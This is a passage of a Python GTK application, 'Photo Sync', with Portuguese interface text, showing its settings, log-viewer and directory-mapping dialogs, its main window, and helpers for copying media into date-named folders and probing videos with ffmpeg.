self.edit_caminho_ffmpeg.set_text(get_app_settings("caminho_ffmpeg"))
button = Gtk.Button.new_from_icon_name("document-open", Gtk.IconSize.BUTTON)
button.connect("clicked", self.do_click_seleciona_ffmpeg)
box_destino = Gtk.Box()
box_destino.pack_start(Gtk.Label(label="Caminho do ffmpeg:", halign=Gtk.Align.START), False, False, 0)
box_destino.pack_start(self.edit_caminho_ffmpeg, True, True, 4)
box_destino.pack_end(button, False, False, 0)
grid.attach(box_destino, 0, 3, 6, 1)
# Lista de videos
self.taskstore_videos = Gtk.ListStore(str)
self.treeview_videos = Gtk.TreeView(model=self.taskstore_videos)
self.treeview_videos.append_column(Gtk.TreeViewColumn("Extensão dos arquivos de Video", Gtk.CellRendererText(), text=0))
scrollable_treelist_videos = Gtk.ScrolledWindow()
scrollable_treelist_videos.set_vexpand(True)
scrollable_treelist_videos.set_hexpand(True)
scrollable_treelist_videos.add(self.treeview_videos)
grid_video = Gtk.Grid()
grid_video.attach(scrollable_treelist_videos, 0, 0, 6, 6)
for video in get_app_settings("extensoes_video").split('|'):
self.taskstore_videos.append([video])
flowbox = Gtk.FlowBox()
button = Gtk.Button.new_from_icon_name("list-add", Gtk.IconSize.MENU)
button.connect("clicked", self.do_click_add_video)
flowbox.add(button)
grid_video.attach(flowbox, 7, 3, 1, 1)
flowbox = Gtk.FlowBox()
button = Gtk.Button.new_from_icon_name("list-remove", Gtk.IconSize.MENU)
button.connect("clicked", self.do_click_del_video)
flowbox.add(button)
grid_video.attach(flowbox, 7, 4, 1, 1)
grid.attach(grid_video, 0, 4, 3, 6)
# Lista de Fotos
self.taskstore_fotos = Gtk.ListStore(str)
self.treeview_fotos = Gtk.TreeView(model=self.taskstore_fotos)
self.treeview_fotos.append_column(Gtk.TreeViewColumn("Extensão dos arquivos de Foto", Gtk.CellRendererText(), text=0))
scrollable_treelist_fotos = Gtk.ScrolledWindow()
scrollable_treelist_fotos.set_vexpand(True)
scrollable_treelist_fotos.set_hexpand(True)
scrollable_treelist_fotos.add(self.treeview_fotos)
grid_foto = Gtk.Grid()
grid_foto.attach(scrollable_treelist_fotos, 0, 0, 6, 6)
for foto in get_app_settings("extensoes_foto").split('|'):
self.taskstore_fotos.append([foto])
flowbox = Gtk.FlowBox()
button = Gtk.Button.new_from_icon_name("list-add", Gtk.IconSize.MENU)
button.connect("clicked", self.do_click_add_foto)
flowbox.add(button)
grid_foto.attach(flowbox, 7, 3, 1, 1)
flowbox = Gtk.FlowBox()
button = Gtk.Button.new_from_icon_name("list-remove", Gtk.IconSize.MENU)
button.connect("clicked", self.do_click_del_foto)
flowbox.add(button)
grid_foto.attach(flowbox, 7, 4, 1, 1)
grid.attach(grid_foto, 4, 4, 3, 6)
self.get_content_area().pack_start(grid, False, False, 0)
self.show_all()
def do_click_seleciona_ffmpeg(self, widget): # @UnusedVariable
debug("Selecionando o caminho do FFMPEG")
dialog = Gtk.FileChooserDialog("Selecione o caminho do ffmpeg ", self, Gtk.FileChooserAction.OPEN,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL, Gtk.STOCK_OPEN, Gtk.ResponseType.OK))
caminho = self.edit_caminho_ffmpeg.get_text().strip()
if os.path.isfile(caminho):
dialog.set_current_folder(caminho)
response = dialog.run()
if response == Gtk.ResponseType.OK:
self.edit_caminho_ffmpeg.set_text(dialog.get_filename())
debug("Caminho do ffmpeg selecionado: " + dialog.get_filename())
dialog.destroy()
def do_click_del_video(self, widget): # @UnusedVariable
self.remove_item("video")
def do_click_add_video(self, widget): # @UnusedVariable
self.add_item("video")
def do_click_del_foto(self, widget): # @UnusedVariable
self.remove_item("foto")
def do_click_add_foto(self, widget): # @UnusedVariable
self.add_item("foto")
def add_item(self, titulo):
info = InputDialog(main_window, 'Informe a extensão do arquivo de ' + titulo, '', None).show_and_get_info()
if info is not None:
store = self.taskstore_videos if titulo == "video" else self.taskstore_fotos
store.append([info])
def remove_item(self, titulo):
debug("Removendo item da lista de " + titulo)
tree = self.treeview_fotos
store = self.taskstore_fotos
if titulo == "video":
store = self.taskstore_videos
tree = self.treeview_videos
select = tree.get_selection()
treeiter = select.get_selected()
if treeiter[1] is None:
return show_message("Não é possível excluir", "É necessário selecionar um dos ítens para continuar.")
        store.remove(treeiter[1])
def show_and_get_info(self):
while self.run() == Gtk.ResponseType.OK:
set_app_settings("remover_apos_copia", str(self.check_remover_copia.get_active()))
set_app_settings("sobrescrever_arquivos", str(self.check_sobrescrever.get_active()))
set_app_settings("recodificar_videos", str(self.check_recode.get_active()))
set_app_settings("caminho_ffmpeg", self.edit_caminho_ffmpeg.get_text().strip())
set_app_settings("codec_video", str(self.combo_codecs.get_active()))
set_app_settings("apenas_fotos_e_videos", str(self.check_fotos_videos.get_active()))
set_app_settings("exibir_resolucao_arquivos", str(self.check_exibir_resolucao.get_active()))
videos = ""
for row in self.taskstore_videos:
videos = videos + "|" + row[0]
videos = videos[1:]
set_app_settings("extensoes_video", videos)
fotos = ""
for row in self.taskstore_fotos:
fotos = fotos + "|" + row[0]
fotos = fotos[1:]
set_app_settings("extensoes_foto", fotos)
self.destroy()
return None
class LogViewerDialog(Gtk.Dialog):
"""
    Dialog for displaying the application log
"""
def __init__(self, parent):
Gtk.Dialog.__init__(self, "Log da aplicação", parent, 0, (Gtk.STOCK_OK, Gtk.ResponseType.OK))
self.set_size_request(1024, 600)
self.set_border_width(10)
scrolledwindow = Gtk.ScrolledWindow()
scrolledwindow.set_hexpand(True)
scrolledwindow.set_vexpand(True)
self.grid = Gtk.Grid()
self.grid.attach(scrolledwindow, 0, 1, 3, 1)
self.textview = Gtk.TextView()
scrolledwindow.add(self.textview)
# Carrega o arquivo de log
self.textview.get_buffer().set_text(open(ARQUIVO_LOG).read())
self.get_content_area().pack_start(self.grid, True, True, 0)
self.show_all()
def show_and_get_info(self):
self.run()
self.destroy()
return None
class MapeamentoDialog(Gtk.Dialog):
"""
    Dialog for mapping the destination directories
"""
def __init__(self, parent):
Gtk.Dialog.__init__(self, "Mapeamento dos diretórios de destino", parent, 0, (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OK, Gtk.ResponseType.OK))
self.set_size_request(500, 400)
self.set_border_width(10)
scrolledwindow = Gtk.ScrolledWindow()
scrolledwindow.set_hexpand(True)
scrolledwindow.set_vexpand(True)
self.grid = Gtk.Grid()
self.grid.attach(scrolledwindow, 0, 1, 3, 1)
self.textview = Gtk.TextView()
scrolledwindow.add(self.textview)
# Carrega o mapeamento atual
global g_dic_mapeamento_dir_destino
lines = ""
for key in sorted(g_dic_mapeamento_dir_destino.iterkeys()):
if key in g_dic_mapeamento_dir_origem:
lines = lines + key + " => " + g_dic_mapeamento_dir_destino[key] + " #" + g_dic_mapeamento_dir_origem[key] + "\n"
else:
lines = lines + key + " => " + g_dic_mapeamento_dir_destino[key] + "\n"
self.textview.get_buffer().set_text(lines)
self.get_content_area().pack_start(self.grid, True, True, 0)
self.show_all()
def show_and_update_file_list(self):
global g_dic_mapeamento_dir_destino
while self.run() == Gtk.ResponseType.OK:
buf = self.textview.get_buffer()
resp = buf.get_text(buf.get_start_iter(), buf.get_end_iter(), True)
for line in resp.splitlines():
key = line[:line.find("=>")].strip()
value = line[line.find("=>") + 2:line.find("#")].strip() if '#' in line else line[line.find("=>") + 2:].strip()
g_dic_mapeamento_dir_destino[key] = value
self.destroy()
return True
self.destroy()
return False
class MainWindow(Gtk.Window):
"""
    Main application window
"""
COLUNAS_GRID = ["Copiar", "Status", "Arquivo", "Destino", "Tipo", "Tamanho", "Detalhes"]
popupMenuTree = Gtk.Menu()
def __init__(self):
Gtk.Window.__init__(self, title="Photo Sync - " + VERSAO_APPLICACAO)
self.set_icon_name("application-x-executable")
Gtk.Settings().set_property('gtk_button_images', True)
# Clipboard para cópia do texto
self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)
self.set_resizable(True)
self.set_border_width(10)
self.set_default_size(640, 480)
self.set_size_request(640, 480)
# Container principal
grid = Gtk.Grid()
grid.set_column_homogeneous(True)
grid.set_row_homogeneous(True)
grid.set_column_spacing(4)
grid.set_row_spacing(6)
# Campo Origem
grid.attach(Gtk.Label(label="Diretório de Origem:", halign=Gtk.Align.START), 0, 0, 1, 1)
self.edit_origem = Gtk.Entry()
self.edit_origem.set_activates_default(True)
self.edit_origem.set_text(get_app_settings("dir_origem"))
grid.attach(self.edit_origem, 1, 0, 6, 1)
button = Gtk.Button.new_from_icon_name("folder-open", Gtk.IconSize.BUTTON)
button.connect("clicked", self.do_click_origem)
flowbox = Gtk.FlowBox()
flowbox.add(button)
grid.attach(flowbox, 7, 0, 1, 1)
self.labelStatusFrom = Gtk.Label(label="", halign=Gtk.Align.START)
grid.attach(self.labelStatusFrom, 0, 1, 8, 1)
# Destination directory field
grid.attach(Gtk.Label(label="Diretório de Destino:", halign=Gtk.Align.START), 0, 2, 1, 1)
self.edit_destino = Gtk.Entry()
self.edit_destino.set_text(get_app_settings("dir_destino"))
grid.attach(self.edit_destino, 1, 2, 6, 1)
button = Gtk.Button.new_from_icon_name("folder-open", Gtk.IconSize.BUTTON)
button.connect("clicked", self.do_click_destino)
flowbox = Gtk.FlowBox()
flowbox.add(button)
grid.attach(flowbox, 7, 2, 1, 1)
self.labelStatusTo = Gtk.Label(label="", halign=Gtk.Align.START)
grid.attach(self.labelStatusTo, 0, 3, 8, 1)
# Button bar
# Read files
self.button_ler_arquivos = create_icon_and_label_button("Atualizar", "view-refresh")
self.button_ler_arquivos.connect("clicked", self.do_click_check_files)
grid.attach(self.button_ler_arquivos, 0, 4, 1, 1)
# Synchronize
self.button_sync_arquivos = create_icon_and_label_button("Sincronizar", "system-run")
self.button_sync_arquivos.set_sensitive(False)
self.button_sync_arquivos.connect("clicked", self.do_click_sync_files)
grid.attach(self.button_sync_arquivos, 1, 4, 1, 1)
# Directory mapping
self.button_mapeamento = create_icon_and_label_button("Mapeamento", "document-properties")
self.button_mapeamento.set_sensitive(False)
self.button_mapeamento.connect("clicked", self.do_click_mapeamento_dir)
grid.attach(self.button_mapeamento, 2, 4, 1, 1)
# Settings
self.button_config = create_icon_and_label_button("Configurações", "applications-system")
self.button_config.connect("clicked", self.do_click_config)
grid.attach(self.button_config, 3, 4, 1, 1)
# Logs
button = create_icon_and_label_button("Logs", "system-search")
button.connect("clicked", self.do_click_logs)
grid.attach(button, 4, 4, 1, 1)
# Close
button = create_icon_and_label_button("Fechar", "window-close")
button.connect("clicked", self.do_click_close)
grid.attach(button, 7, 4, 1, 1)
# File grid
# Create the grid
self.store = Gtk.ListStore(bool, str, str, str, str, str, str)
self.filtro = self.store.filter_new()
# self.filtro.set_visible_func(self.do_filter_grid)
cellRenderer = Gtk.CellRendererText()
# Add the COLUNAS_GRID columns to the TreeView
self.treeview = Gtk.TreeView(model=self.store)
self.treeview.connect("button_press_event", self.do_show_popup)
# Columns 0 and 1 are not text
col1 = Gtk.TreeViewColumn("Copiar", Gtk.CellRendererToggle(), active=0)
col1.set_sort_column_id(0)
self.treeview.append_column(col1)
col2 = Gtk.TreeViewColumn("Status", Gtk.CellRendererPixbuf(), icon_name=1)
col2.set_sort_column_id(1)
self.treeview.append_column(col2)
# Add the remaining COLUNAS_GRID columns
for i, column_title in enumerate(self.COLUNAS_GRID):
column = Gtk.TreeViewColumn(column_title, cellRenderer, text=i)
if i > 1: # Columns 0 and 1 (checkbox and icon) were added above
self.treeview.append_column(column)
self.store.set_sort_func(i, compareTreeItem, None)
column.set_sort_column_id(i)
self.treeview.connect("row-activated", self.on_tree_double_clicked)
# Add the treeview to a scrolled window
scrollable_treelist = Gtk.ScrolledWindow()
scrollable_treelist.set_vexpand(True)
scrollable_treelist.add(self.treeview)
grid.attach(scrollable_treelist, 0, 5, 8, 8)
# File selection summary label
self.label_status_copia = Gtk.Label(label="", halign=Gtk.Align.START)
grid.attach(self.label_status_copia, 0, 13, 8, 1)
self.add(grid)
i0 = Gtk.MenuItem("Desmarcar todos os arquivos")
i0.connect("activate", self.do_desmarcar_todos)
self.popupMenuTree.append(i0)
i1 = Gtk.MenuItem("Marcar todos os videos")
i1.connect("activate", self.do_marca_todos_videos)
self.popupMenuTree.append(i1)
i2 = Gtk.MenuItem("Marcar todas as fotos")
i2.connect("activate", self.do_marca_todas_fotos)
self.popupMenuTree.append(i2)
i3 = Gtk.MenuItem("Marcar videos não H265")
i3.connect("activate", self.do_marcar_nao_h265)
self.popupMenuTree.append(i3)
i4 = Gtk.MenuItem("Apagar arquivos marcados")
i4.connect("activate", self.do_apagar_selecionados)
self.popupMenuTree.append(i4)
self.popupMenuTree.show_all()
def do_show_popup(self, tv, event): # @UnusedVariable
if event.button == 3:
self.popupMenuTree.popup(None, None, None, None, 0, Gtk.get_current_event_time())
def do_apagar_selecionados(self, widget): # @UnusedVariable
debug("MenuItem: Apagar arquivos marcados")
arquivos = self.do_monta_lista_arquivos_copiar()
if len(arquivos) > 0:
dialog = Gtk.MessageDialog(self, 0, Gtk.MessageType.QUESTION, Gtk.ButtonsType.YES_NO, "Confirmação da exclusão")
dialog.format_secondary_text("Você realmente deseja remover os " + str(len(arquivos)) + " arquivos marcados?")
response = dialog.run()
if response == Gtk.ResponseType.YES:
for arquivo in arquivos:
debug("Removendo arquivo " + arquivo)
os.remove(arquivo)
self.do_monta_lista_arquivos()
dialog.destroy()
def do_marcar_nao_h265(self, widget): # @UnusedVariable
debug("MenuItem: Marcar videos não H265")
for row in self.store:
if self.is_video(row[2]) and 'hevc' not in row[6]:
row[0] = True
self.do_atualiza_contador_selecao()
def do_marca_todas_fotos(self, widget): # @UnusedVariable
debug("MenuItem: Marcar todas as fotos")
for row in self.store:
if self.is_foto(row[2]):
row[0] = True
def do_marca_todos_videos(self, widget): # @UnusedVariable
debug("MenuItem: Marcar todos os videos")
for row in self.store:
if self.is_video(row[2]):
row[0] = True
self.do_atualiza_contador_selecao()
def do_desmarcar_todos(self, widget): # @UnusedVariable
debug("MenuItem: Desmarcar todos os arquivos")
for row in self.store:
row[0] = False
self.do_atualiza_contador_selecao()
def do_click_origem(self, widget): # @UnusedVariable
self.do_seleciona_dir("origem")
def do_click_destino(self, widget): # @UnusedVariable
self.do_seleciona_dir("destino")
def do_seleciona_dir(self, titulo):
debug("Selecionando diretório de " + titulo)
editor = self.edit_origem if titulo == "origem" else self.edit_destino
dialog = Gtk.FileChooserDialog("Selecione o diretório de " + titulo, self, Gtk.FileChooserAction.SELECT_FOLDER,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL, Gtk.STOCK_OPEN, Gtk.ResponseType.OK))
current_dir = editor.get_text().strip()
if os.path.isdir(current_dir):
dialog.set_current_folder(current_dir)
response = dialog.run()
if response == Gtk.ResponseType.OK:
editor.set_text(dialog.get_filename())
debug("Diretório de " + titulo + " selecionado: " + dialog.get_filename())
set_app_settings("dir_" + titulo, dialog.get_filename())
dialog.destroy()
def get_tipo_arquivo(self, arquivo):
tipo = "Desconhecido"
if self.is_foto(arquivo):
tipo = "Foto"
elif self.is_video(arquivo):
tipo = "Video"
return tipo
def get_file_is_sync(self, arquivo):
global g_lista_arquivos_destino
arquivos = g_lista_arquivos_destino.get(os.path.basename(arquivo), [])
tamanho_origem = os.stat(arquivo).st_size
found = False
if len(arquivos) > 0:
for dests in arquivos:
found = found or tamanho_origem == os.stat(dests).st_size
return found
def get_icone_arquivo(self, sync):
mover = 'True' == get_app_settings("remover_apos_copia")
resp = "forward" if mover else "go-down"
if sync:
sobrescreve = 'True' == get_app_settings("sobrescrever_arquivos")
resp = "gtk-stop" if sobrescreve else "ok"
return resp
def do_monta_lista_arquivos(self):
active = g_leitura_origem_finalizada and g_leitura_destino_finalizada
if active:
debug("Populando a grid de arquivos")
global g_lista_arquivos_origem
global g_dic_info_arquivos_origem
# Check whether existing files should be overwritten
sobrescrever = 'True' == get_app_settings("sobrescrever_arquivos")
self.store.clear()
src = self.edit_origem.get_text().strip()
pos_src = len(src) if src.endswith(os.sep) else len(src) + 1
for arquivo in g_lista_arquivos_origem:
sync = self.get_file_is_sync(arquivo)
icon = self.get_icone_arquivo(sync)
tamanho = to_human_size(os.stat(arquivo).st_size)
detalhes = g_dic_info_arquivos_origem[arquivo]
arquivo_abr = arquivo[pos_src:]
tipo_arquivo = self.get_tipo_arquivo(arquivo)
destino = get_destino_arquivo(arquivo)
# When overwriting, sync must always be False
if sobrescrever:
sync = False
self.store.append([
not sync,
icon,
arquivo_abr,
destino,
tipo_arquivo,
tamanho,
detalhes
])
# Enable the buttons
self.button_ler_arquivos.set_sensitive(active)
self.button_sync_arquivos.set_sensitive(active)
self.button_mapeamento.set_sensitive(active)
# Update the selection counter
self.do_atualiza_contador_selecao()
debug("Grid de arquivos populada")
def do_read_file_list_origem(self):
global g_lista_arquivos_origem
global g_leitura_origem_finalizada
global g_dic_info_arquivos_origem
g_dic_info_arquivos_origem = {}
# Build the file list
g_lista_arquivos_origem = [y for x in os.walk(self.edit_origem.get_text()) for y in glob(os.path.join(x[0], '*.*'))]
tamanho = 0
for arquivo in g_lista_arquivos_origem:
try:
# Load the file information
g_dic_info_arquivos_origem[arquivo] = self.get_file_info(arquivo)
tamanho = tamanho + os.stat(arquivo).st_size # in bytes
except Exception:
debug("Falha ao ler o arquivo de origem " + arquivo)
self.labelStatusFrom.set_text("Arquivos no diretório de origem: " + str(len(g_lista_arquivos_origem)) + " (" + to_human_size(tamanho) + ")")
debug(self.labelStatusFrom.get_text())
g_leitura_origem_finalizada = True
self.do_monta_lista_arquivos()
debug("Consulta da lista de arquivos de origem concluída")
def do_read_file_list_destino(self):
global g_leitura_destino_finalizada
global g_lista_arquivos_destino
g_lista_arquivos_destino = {}
lista_arquivos_destino = [y for x in os.walk(self.edit_destino.get_text()) for y in glob(os.path.join(x[0], '*.*'))]
tamanho = 0
for arquivo in lista_arquivos_destino:
try:
tamanho = tamanho + os.stat(arquivo).st_size # in bytes
nome = os.path.basename(arquivo)
arquivos = g_lista_arquivos_destino.get(nome, [])
arquivos.append(arquivo)
g_lista_arquivos_destino[nome] = arquivos
except Exception:
debug("Falha ao ler o arquivo de destino " + arquivo)
self.labelStatusTo.set_text("Arquivos no diretório de destino: " + str(len(lista_arquivos_destino)) + " (" + to_human_size(tamanho) + ")")
debug(self.labelStatusTo.get_text())
g_leitura_destino_finalizada = True
self.do_monta_lista_arquivos()
debug("Consulta da lista de arquivos de destino concluída")
def do_click_check_files(self, widget): # @UnusedVariable
debug("Validando os diretórios")
if not os.path.isdir(self.edit_origem.get_text()):
return show_message("Diretório inexistente", "Não foi possível encontrar o diretório de origem.")
if not os.path.isdir(self.edit_destino.get_text()):
return show_message("Diretório inexistente", "Não foi possível encontrar o diretório de destino.")
debug("Verificando a lista de arquivos")
global g_lista_arquivos_origem
global g_lista_arquivos_destino
global g_leitura_origem_finalizada
global g_leitura_destino_finalizada
global g_dic_mapeamento_dir_origem
global g_dic_mapeamento_dir_destino
g_lista_arquivos_origem = []
g_lista_arquivos_destino = {}
g_leitura_origem_finalizada = False
g_leitura_destino_finalizada = False
g_dic_mapeamento_dir_origem = {}
g_dic_mapeamento_dir_destino = {}
# Disable the buttons
self.button_ler_arquivos.set_sensitive(False)
self.button_sync_arquivos.set_sensitive(False)
self.button_mapeamento.set_sensitive(False)
self.store.clear()
# Thread(target=self.do_read_file_list_origem).start()
# Thread(target=self.do_read_file_list_destino).start()
# Compare the source file list against the destination
self.do_read_file_list_origem()
self.do_read_file_list_destino()
def do_atualiza_contador_selecao(self):
cont = 0
cont_video = 0
cont_foto = 0
cont_outro = 0
size = 0
size_video = 0
size_foto = 0
size_outro = 0
for row in self.store:
if row[0]:
arquivo = self.edit_origem.get_text() + os.sep + row[2]
cont += 1
size += os.stat(arquivo).st_size
if self.is_video(arquivo):
cont_video += 1
size_video += os.stat(arquivo).st_size
elif self.is_foto(arquivo):
cont_foto += 1
size_foto += os.stat(arquivo).st_size
else:
cont_outro += 1
size_outro += os.stat(arquivo).st_size
self.label_status_copia.set_text("Arquivos selecionados: " + str(cont) + " / " + str(len(self.store)) + " (" + to_human_size(size) + ") - Videos: " +
str(cont_video) + " (" + to_human_size(size_video) + ") - Fotos: " + str(cont_foto) + " (" + to_human_size(size_foto) + ") - Outros: " + str(cont_outro) + "(" + to_human_size(size_outro) + ")")
def do_monta_lista_arquivos_copiar(self):
resp = []
path_base = self.edit_origem.get_text()
for row in self.store:
if row[0]:
resp.append(path_base + os.sep + row[2])
return resp
def is_video(self, arquivo):
for ext in get_app_settings("extensoes_video").split('|'):
if arquivo.lower().endswith(ext.lower()):
return True
return False
def is_foto(self, arquivo):
for ext in get_app_settings("extensoes_foto").split('|'):
if arquivo.lower().endswith(ext.lower()):
return True
return False
def do_obter_lista_fotos(self, videos):
resp = []
for arquivo in videos:
if self.is_foto(arquivo):
resp.append(arquivo)
return resp
def do_obter_lista_videos(self, arquivos):
resp = []
for arquivo in arquivos:
if self.is_video(arquivo):
resp.append(arquivo)
return resp
def do_click_mapeamento_dir(self, widget): # @UnusedVariable
debug("Mapeamento de diretórios")
global g_dic_mapeamento_dir_origem
g_dic_mapeamento_dir_origem = {}
global g_dic_mapeamento_dir_destino
g_dic_mapeamento_dir_destino = {}
for arquivo in self.do_monta_lista_arquivos_copiar():
destino = os.path.dirname(get_destino_arquivo(arquivo))
g_dic_mapeamento_dir_destino[destino] = destino
g_dic_mapeamento_dir_origem[destino] = os.path.basename(os.path.dirname(arquivo))
if MapeamentoDialog(main_window).show_and_update_file_list():
self.do_monta_lista_arquivos()
def do_click_sync_files(self, widget): # @UnusedVariable
debug("Montando a lista dos arquivos que serão copiados")
# Get the list of selected files
arquivos = self.do_monta_lista_arquivos_copiar()
# Keep only videos and photos
if 'True' == get_app_settings("apenas_fotos_e_videos"):
debug("Filtrando apenas videos e fotos")
medias = self.do_obter_lista_fotos(arquivos)
medias.extend(self.do_obter_lista_videos(arquivos))
arquivos = medias
debug("Iniciando a cópia dos arquivos")
# Copy the files
dialog_arquivos = FileCopyProgressDialog(main_window, arquivos, self.edit_destino.get_text())
dialog_arquivos.run()
dialog_arquivos.must_stop = True
if dialog_arquivos.failed:
show_message("Falha na cópia dos arquivos!", "Ocorreram falhas durante a cópia de pelo menos um arquivo, verifique o log para mais informações.")
dialog_arquivos.destroy()
debug("Cópia dos arquivos finalizada")
# Check whether videos should be re-encoded
if 'True' == get_app_settings("recodificar_videos"):
debug("Montando a lista de videos a serem compactados")
arquivos = self.do_obter_lista_videos(arquivos)
if len(arquivos) > 0:
debug("Compactando " + str(len(arquivos)) + " video(s).")
# Save STDOUT in case ffmpeg is interrupted
saved_stdout = sys.stdout
# Run the video encoding dialog
dialog_video = VideoEncodeProgressDialog(main_window, arquivos, self.edit_destino.get_text(),)
dialog_video.run()
# Force the conversion to stop if the user pressed cancel
dialog_video.must_stop = True
if dialog_video.failed:
show_message("Falha na conversão!", "Ocorreram falhas durante a conversão de pelo menos uma video, verifique o log para mais informações.")
global g_processo_ffmpeg
if g_processo_ffmpeg is not None:
try:
g_processo_ffmpeg.kill()
debug("O processo do ffmpeg foi interrompido pelo usuário.")
except OSError:
debug("O processo do ffmpeg foi finalizado com sucesso.")
dialog_video.destroy()
debug("Codificação dos vídeos finalizada")
# Restore the original STDOUT
sys.stdout = saved_stdout
show_message("Concluído!", "Operação de cópia dos arquivos finalizada!")
def do_click_config(self, widget): # @UnusedVariable
debug("Configurando a aplicação")
ConfigDialog(main_window).show_and_get_info()
def do_click_logs(self, widget): # @UnusedVariable
debug("Visualizando os logs")
LogViewerDialog(main_window).show_and_get_info()
def do_click_close(self, widget): # @UnusedVariable
on_close(None, None)
def on_tree_double_clicked(self, widget, row, col): # @UnusedVariable
debug("Duplo click na lista de arquivos (" + str(row) + "," + str(col.get_sort_column_id()) + ")")
select = self.treeview.get_selection()
model, treeiter = select.get_selected()
self.store.set_value(treeiter, 0, not model[treeiter][0])
self.do_atualiza_contador_selecao()
def get_file_info(self, arquivo):
captureInfo = 'True' == get_app_settings("exibir_resolucao_arquivos")
if not captureInfo or (not self.is_foto(arquivo) and not self.is_video(arquivo)):
return ""
pattern = re.compile("(Duration: [0-9]{2,}:[0-9]{2,}:[0-9]{2,})|(Video: [^\s]+)|([0-9]{2,}x[0-9]{2,})|([0-9|.]+ fps)|(Audio: [^\s]+)|([0-9]+ Hz)")
args = [get_caminho_ffmpeg(), "-hide_banner", "-i", arquivo]
global g_processo_ffmpeg
g_processo_ffmpeg = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, universal_newlines=True)
lines = ""
# Start the process and concatenate the output lines
for line in iter(g_processo_ffmpeg.stdout.readline, ''):
# Keep only the essential lines; str.find() returns -1 when absent, so use "in"
if "Stream #0" in line or " Duration:" in line:
lines = lines + line
if "Duration: 00:00:00" in lines:
lines = lines.replace("Duration: 00:00:00", "")
lines = lines.replace("Video: ", "")
# Collect the text from the regex groups
resp = ""
for m in pattern.finditer(lines):
resp = resp + m.group() + " "
# Finish the ffmpeg process
g_processo_ffmpeg.stdout.close()
g_processo_ffmpeg.wait()
return resp
def get_destino_arquivo(arquivo):
global g_dic_mapeamento_dir_destino
g_dic_mapeamento_dir_destino = {} if g_dic_mapeamento_dir_destino is None else g_dic_mapeamento_dir_destino
nome = os.path.basename(arquivo)
data = datetime.datetime.fromtimestamp(os.path.getmtime(arquivo))
# Destination layout: /YYYY/yyyy-MM-dd/<file>
destino = str(data.year) + os.sep + str(data.year) + "-" + str(data.month).zfill(2) + "-" + str(data.day).zfill(2)
if destino in g_dic_mapeamento_dir_destino:
destino = g_dic_mapeamento_dir_destino[destino]
return destino + os.sep + nome
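# Editor's illustration (hypothetical values, not part of the original code):
# a file "IMG_0001.jpg" whose modification time falls on 2017-03-05 maps to
# "2017/2017-03-05/IMG_0001.jpg", unless that day's folder was remapped
# through g_dic_mapeamento_dir_destino in the MapeamentoDialog.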
def create_icon_and_label_button(label, icon):
"""
Create a button with an icon and a label
"""
debug("Criando botão: " + label)
button = Gtk.Button.new()
grid = Gtk.Grid()
grid.set_column_spacing(6)
grid.attach(Gtk.Image.new_from_icon_name(icon, Gtk.IconSize.LARGE_TOOLBAR), 0, 0, 1, 1)
grid.attach(Gtk.Label(label=label, halign=Gtk.Align.CENTER), 1, 0, 1, 1)
grid.show_all()
button.add(grid)
return button
def compareTreeItem(model, row1, row2, user_data): # @UnusedVariable
"""
Compare two tree items
"""
sort_column, _ = model.get_sort_column_id()
value1 = model.get_value(row1, sort_column)
value2 = model.get_value(row2, sort_column)
if value1 < value2:
return -1
elif value1 == value2:
return 0
else:
return 1
def show_message(titulo, msg):
"""
Show an information dialog
"""
debug("Exibindo dialog: " + titulo + " - " + msg)
global main_window
dialog = Gtk.MessageDialog(main_window, 0, Gtk.MessageType.INFO, Gtk.ButtonsType.CLOSE, titulo)
dialog.format_secondary_text(msg)
dialog.run()
dialog.destroy()
return None
def indent_xml(elem, level=0):
"""
Indent (pretty-print) an XML tree in place
"""
i = "\n" + level * "\t"
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + "\t"
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent_xml(elem, level + 1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def set_app_settings(xml_tag, value):
"""
Save an application setting
"""
debug("Salvando configuração da aplicação: " + xml_tag + " = " + value)
if not os.path.isfile(ARQUIVO_XML_SETTINGS):
indent_and_save_xml(ET.Element('config'), ARQUIVO_XML_SETTINGS)
config_tree = ET.parse(ARQUIVO_XML_SETTINGS, ET.XMLParser(remove_comments=False, strip_cdata=False))
root = config_tree.getroot()
# Remove the node if it already exists
if config_tree.find("./" + xml_tag) is not None:
root.remove(config_tree.find("./" + xml_tag))
# If the value is not empty, add the new node
if value is not None and value.strip():
ET.SubElement(root, xml_tag).text = value
indent_and_save_xml(config_tree.getroot(), ARQUIVO_XML_SETTINGS)
def get_app_settings(xml_tag):
"""
Retrieve an application setting
"""
node_caminho = ET.parse(ARQUIVO_XML_SETTINGS, ET.XMLParser(remove_comments=False, strip_cdata=False)).find("./" + xml_tag)
return None if node_caminho is None else node_caminho.text
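# Editor's sketch (illustrative, hypothetical values): settings.xml written by
# set_app_settings() is a flat document such as
#   <config>
#       <dir_origem>/home/user/Pictures</dir_origem>
#       <caminho_ffmpeg>ffmpeg</caminho_ffmpeg>
#   </config>
# so get_app_settings("dir_origem") returns the node text, or None when the tag is absent.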
def indent_and_save_xml(root_node, arquivo_xml):
"""
Indent and save an XML file
"""
debug("Salvando o arquivo XML: " + arquivo_xml)
indent_xml(root_node)
pretty_xml = ET.tostring(root_node, encoding="UTF-8", method="xml", xml_declaration=True)
arquivo = open(arquivo_xml, "wb")
arquivo.write(pretty_xml)
arquivo.close()
def debug(msg=''):
"""
Log a message
"""
try:
linha = str(msg).strip()
except (UnicodeEncodeError):
linha = msg.encode("utf-8").strip()
g_logger.debug(linha)
def to_human_size(nbytes):
"""
Convert a byte count into a human-readable string
"""
human = nbytes
rank = 0
if nbytes != 0:
rank = int((math.log10(nbytes)) / 3)
rank = min(rank, len(UNIDADES) - 1)
human = nbytes / (1024.0 ** rank)
f = ('%.2f' % human).rstrip('0').rstrip('.')
return '%s %s' % (f, UNIDADES[rank])
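# Editor's worked example (assumed input): to_human_size(1536) gives
# rank = int(log10(1536) / 3) = 1 and human = 1536 / 1024.0 = 1.5,
# so the function returns "1.5 KB".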
def on_close(self, widget): # @UnusedVariable
"""
Close the application, releasing the log FileHandler
"""
logHandler.close()
g_logger.removeHandler(logHandler)
sys.exit()
def get_codec_info(codec):
"""
